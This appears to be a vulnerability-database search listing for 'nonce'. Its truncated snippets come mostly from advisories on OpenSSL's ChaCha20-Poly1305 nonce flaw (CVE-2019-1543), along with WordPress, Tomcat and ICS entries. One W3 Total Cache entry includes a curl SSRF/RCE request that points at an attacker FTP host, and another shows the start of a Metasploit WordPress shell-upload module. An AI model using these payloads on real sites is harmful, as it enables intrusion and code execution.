OpenSSL: ChaCha20-Poly1305 with long nonces (CVE-2019-1543) - Windows

OpenSSL is prone to a vulnerability which allows a nonce reuse. SPDX-FileCopyrightText: 2019 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:openssl:openssl";...

Debian DSA-4475-1 : openssl - security update

Joran Dirk Greef discovered that overly long nonces used with ChaCha20-Poly1305 were incorrectly processed and could result in nonce reuse. This doesn't affect OpenSSL-internal uses of ChaCha20-Poly1305 such as TLS. C Tenable Network Security, Inc. The descriptive text and package checks in this...

[SECURITY] [DSA 4475-1] openssl security update

------------------------------------------------------------------------- Debian Security Advisory DSA-4475-1 [email protected] https://www.debian.org/security/ Moritz Muehlenhoff July 01, 2019 https://www.debian.org/security/faq -...

[ASA-201906-7] openssl: information disclosure

Arch Linux Security Advisory ASA-201906-7 ========================================= Severity: Low Date : 2019-06-11 CVE-ID : CVE-2019-1543 Package : openssl Type : information disclosure Remote : Yes Link : https://security.archlinux.org/AVG-919 Summary ======= The package openssl before version...

[ASA-201906-6] lib32-openssl: information disclosure

Arch Linux Security Advisory ASA-201906-6 ========================================= Severity: Low Date : 2019-06-11 CVE-ID : CVE-2019-1543 Package : lib32-openssl Type : information disclosure Remote : Yes Link : https://security.archlinux.org/AVG-920 Summary ======= The package lib32-openssl...

OpenSSL 1.1.1 < 1.1.1c Vulnerability

The version of OpenSSL installed on the remote host is prior to 1.1.1c. It is, therefore, affected by a vulnerability as referenced in the 1.1.1c advisory. - ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce...

OpenSSL 1.1.0 < 1.1.0k Vulnerability

The version of OpenSSL installed on the remote host is prior to 1.1.0k. It is, therefore, affected by a vulnerability as referenced in the 1.1.0k advisory. - ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce...

CVE-2019-11231

An issue was discovered in GetSimple CMS through 3.3.15. insufficient input sanitation in the theme-edit.php file allows upload of files with arbitrary content PHP code, for example. This vulnerability is triggered by an authenticated user; however, authentication can be bypassed. According to th...

Rockwell Automation/Allen-Bradley MicroLogix Controllers <= 16.00 Nonce Key Pair Reuse

Binary data 720126.prm...

EulerOS 2.0 SP2 : openssl110f (EulerOS-SA-2019-1327)

According to the version of the openssl110f packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce value...

W3 Total Cache <= 0.9.7.3 - Blind SSRF and RCE via phar

The implementation of opcacheflushfile calls fileexists with a parameter fully controlled by the user. curl 'http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php' --data 'nonce=974ca6ad15021a6668e7ae02e1be551c&command=flushfile&file=ftp://y.y.y.y:zzzz/' Note: The nonce value is given ...

EulerOS 2.0 SP3 : openssl110f (EulerOS-SA-2019-1328)

According to the version of the openssl110f packages installed, the EulerOS installation on the remote host is affected by the following vulnerability : - ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce value...

Authentication Bypass

tomcat6 is vulnerable to authentication bypass. The vulnerability exists through the ability to perform replay attacks after a nonce becomes stale...

WordPress 5.0.0 crop-image Shell Upload

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress Crop-image Shell Upload', 'Description' = %q This module exploits a path traversal and a local file inclusion vulnerability on WordPres...

CVE-2019-1543

ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce value IV should be 96 bits 12 bytes. OpenSSL allows a variable nonce length and front pads the nonce with 0 bytes if it is less than 12 bytes. However it also...

WordPress 5.1: from CSRF to RCE-vulnerability warning-the black bar safety net

One, Foreword Note: this exploit and the environment is more complex, the actual value may not be very high, but forXSSwith permissions management also has certain reference value. Last month we published a WordPress 5.0, a remote code execution RCE）vulnerabilities required by the authentication...

Replay Attack

http-auth is vulnerable to replay attack. The vulnerability exists because it is not properly invalidate expired Nonce in validateNonce and allows the replay attack when the client specifies a large nonceCount value...

WordPress 5.1.1Nonce Bypass Stored XSS Vulnerability

WordPress is a free and open source blogging software and content management system that uses PHP and MySQL as its platform. WordPress 5.1.1Nonce Bypass suffers from a stored XSS vulnerability, which can be exploited by an attacker to inject malicious Javascipt scripts, or even modify the backend...

WordPress Fastest Cache 0.8.9.0 Arbitrary File Deletion Exploit

WordPress WP Fastest Cache plugin versions 0.8.9.0 and below suffer from an arbitrary file deletion vulnerability. The wordpress plugin "WP Fastest Cache" 0 suffered from an arbitrary file deletion bug. Description A successful attack allows an unauthenticated attacker to specify a path to a...

FreeBSD : OpenSSL -- ChaCha20-Poly1305 nonce vulnerability (e56f2f7c-410e-11e9-b95c-b499baebfeaf)

The OpenSSL project reports : Low: ChaCha20-Poly1305 with long nonces CVE-2019-1543 ChaCha20-Poly1305 is an AEAD cipher, and requires a unique nonce input for every encryption operation. RFC 7539 specifies that the nonce value IV should be 96 bits 12 bytes. OpenSSL allows a variable nonce length...